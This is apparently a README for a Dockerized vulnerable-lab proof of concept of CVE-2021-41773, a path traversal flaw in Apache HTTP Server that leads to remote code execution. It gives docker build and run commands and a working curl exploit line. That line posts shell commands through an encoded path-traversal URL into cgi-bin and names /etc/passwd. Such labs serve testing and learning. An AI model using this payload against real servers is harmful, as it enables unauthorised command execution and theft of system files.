
Dockerized proof-of-concept for Apache HTTP Server path traversal and RCE (CVE-2021-41773), including build instructions and curl-based exploitation steps.
$ docker build -t cve-2021-41773 .
$ docker run --rm -d -p 80:80 cve-2021-41773
curl --data "echo;id" 'http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'
Misconfiguration in the httpd.conf file combined with Path traversal => RCE
